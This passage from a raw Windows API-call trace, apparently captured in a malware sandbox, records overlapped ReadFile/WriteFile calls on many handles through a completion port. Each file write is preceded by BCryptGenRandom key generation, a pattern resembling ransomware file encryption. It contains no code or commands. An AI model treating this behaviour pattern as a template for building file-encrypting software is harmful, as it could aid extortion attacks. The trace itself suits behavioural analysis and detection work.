hFile=0x2a8, lpBuffer=0x3f7007c*, nNumberOfBytesToWrite=0xb10, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3f70048) returned 1 [0209.577] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.667] ReadFile (in: hFile=0x308, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x616, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.667] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.669] ReadFile (in: hFile=0x2a8, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x328, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.669] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.710] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0209.711] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.711] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.711] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0209.711] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.711] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.711] free (_Block=0x3e305b8) [0209.711] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.711] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.712] free (_Block=0x1fa91d0) [0209.712] free (_Block=0x1fa2ed8) [0209.712] free (_Block=0x1fa90b8) [0209.712] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0209.712] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.730] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x11e, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0209.730] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.742] ReadFile (in: hFile=0xec, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x193, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 0x0 [0209.742] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.753] ReadFile (in: hFile=0x3cc, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x664, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0209.753] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.762] ReadFile (in: hFile=0x238, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x9c5, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 0x0 [0209.762] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.767] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x4d3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.767] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.949] CloseHandle (hObject=0x170) returned 1 [0209.950] free (_Block=0x3df0008) [0209.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.950] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x5e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0209.950] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.958] ReadFile (in: hFile=0x238, lpBuffer=0x3d70484, nNumberOfBytesToRead=0x6f9, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3d70450) returned 1 [0209.958] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.958] CloseHandle (hObject=0x238) returned 1 [0209.959] free (_Block=0x3d70450) [0209.959] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.967] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.967] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0209.967] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0209.968] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0209.968] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0209.968] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0209.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0209.968] free (_Block=0x3e305b8) [0209.968] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0209.968] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0209.969] free (_Block=0x1fa91d0) [0209.969] free (_Block=0x1fa2ed8) [0209.969] free (_Block=0x1fa90b8) [0209.969] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61b, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.969] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.970] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x190, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0209.970] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.981] ReadFile (in: hFile=0x238, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x1d0, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0209.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0209.981] CloseHandle (hObject=0x238) returned 1 [0209.981] free (_Block=0x3df0008) [0209.981] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.000] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.000] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.000] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.001] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.001] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.001] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.001] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.001] free (_Block=0x3e305b8) [0210.001] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.001] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.002] free (_Block=0x1fa91d0) [0210.002] free (_Block=0x1fa2ed8) [0210.002] free (_Block=0x1fa90b8) [0210.002] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x61f, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.002] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.015] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.016] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.016] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.016] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.017] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.017] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.017] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.017] free (_Block=0x3e305b8) [0210.017] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.017] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.018] free (_Block=0x1fa91d0) [0210.018] free (_Block=0x1fa2ed8) [0210.018] free (_Block=0x1fa90b8) [0210.018] WriteFile (in: hFile=0xec, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x618, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.018] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.029] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.029] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.029] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.030] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.030] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.030] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.030] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.030] free (_Block=0x3e305b8) [0210.030] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.030] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.031] free (_Block=0x1fa91d0) [0210.031] free (_Block=0x1fa2ed8) [0210.031] free (_Block=0x1fa90b8) [0210.031] WriteFile (in: hFile=0x170, lpBuffer=0x3d70484, nNumberOfBytesToWrite=0x615, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 0x0 [0210.031] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.053] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.054] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.054] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.054] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.055] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.055] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.055] free (_Block=0x3e305b8) [0210.055] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.055] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.055] free (_Block=0x1fa91d0) [0210.055] free (_Block=0x1fa2ed8) [0210.055] free (_Block=0x1fa90b8) [0210.056] WriteFile (in: hFile=0x3cc, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61c, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0210.056] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.081] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x96, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 0x0 [0210.081] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.108] ReadFile (in: hFile=0x338, lpBuffer=0x3f7007c, nNumberOfBytesToRead=0x46b, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048 | out: lpBuffer=0x3f7007c, lpNumberOfBytesRead=0x0, lpOverlapped=0x3f70048) returned 0x0 [0210.108] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.116] ReadFile (in: hFile=0x308, lpBuffer=0x3fb00ec, nNumberOfBytesToRead=0x8e3, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8 | out: lpBuffer=0x3fb00ec*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3fb00b8) returned 1 [0210.116] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.117] WriteFile (in: hFile=0xec, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x160, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.117] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.156] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.156] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.156] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.157] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.157] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.157] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.157] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.157] free (_Block=0x3e305b8) [0210.157] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.157] calloc (_Count=0x82, _Size=0x4) returned 0x1fa2ed8 [0210.158] free (_Block=0x1fa91d0) [0210.158] free (_Block=0x1fa2ed8) [0210.158] free (_Block=0x1fa90b8) [0210.158] WriteFile (in: hFile=0x308, lpBuffer=0x3d70484*, nNumberOfBytesToWrite=0x614, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450 | out: lpBuffer=0x3d70484*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3d70450) returned 1 [0210.159] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.170] CloseHandle (hObject=0x238) returned 1 [0210.171] free (_Block=0x1ff1e60) [0210.171] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.185] ReadFile (in: hFile=0x338, lpBuffer=0x3e7003c, nNumberOfBytesToRead=0x2da, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3e70008) returned 1 [0210.185] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.191] ReadFile (in: hFile=0x2a8, lpBuffer=0x3ef003c, nNumberOfBytesToRead=0x34d, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008 | out: lpBuffer=0x3ef003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3ef0008) returned 1 [0210.191] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.192] WriteFile (in: hFile=0x238, lpBuffer=0x1ff1e94*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x1ff1e60) returned 1 [0210.194] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.236] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336fc30, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x336fc30) returned 0x0 [0210.237] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0210.237] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0210.237] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x336f970, cbBuffer=0x80, dwFlags=0x2 | out: pbBuffer=0x336f970) returned 0x0 [0210.238] calloc (_Count=0x40, _Size=0x4) returned 0x3e305b8 [0210.238] calloc (_Count=0x41, _Size=0x4) returned 0x1fa90b8 [0210.238] free (_Block=0x3e305b8) [0210.238] calloc (_Count=0x41, _Size=0x4) returned 0x1fa91d0 [0210.238] calloc (_Count=0x82, _Size=0x4) returned 0x77d7a8 [0210.238] free (_Block=0x1fa91d0) [0210.238] free (_Block=0x77d7a8) [0210.239] free (_Block=0x1fa90b8) [0210.239] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x61d, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0210.239] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.240] WriteFile (in: hFile=0x238, lpBuffer=0x3df003c*, nNumberOfBytesToWrite=0x740, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3df0008) returned 1 [0210.240] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.264] CloseHandle (hObject=0x2a8) returned 1 [0210.264] free (_Block=0x1ff1e60) [0210.264] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.268] WriteFile (in: hFile=0x308, lpBuffer=0x3e7003c*, nNumberOfBytesToWrite=0x1e0, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008 | out: lpBuffer=0x3e7003c*, lpNumberOfBytesWritten=0x0, lpOverlapped=0x3e70008) returned 1 [0210.268] GetQueuedCompletionStatus (in: CompletionPort=0x14c, lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18, dwMilliseconds=0xffffffff | out: lpNumberOfBytesTransferred=0x336fc0c, lpCompletionKey=0x336fc1c, lpOverlapped=0x336fc18) returned 1 [0210.268] WriteFile (in: hFile=0xec, lpBuffer=0x3ef003c*, nNumberOfBytesToWrite=0x160, 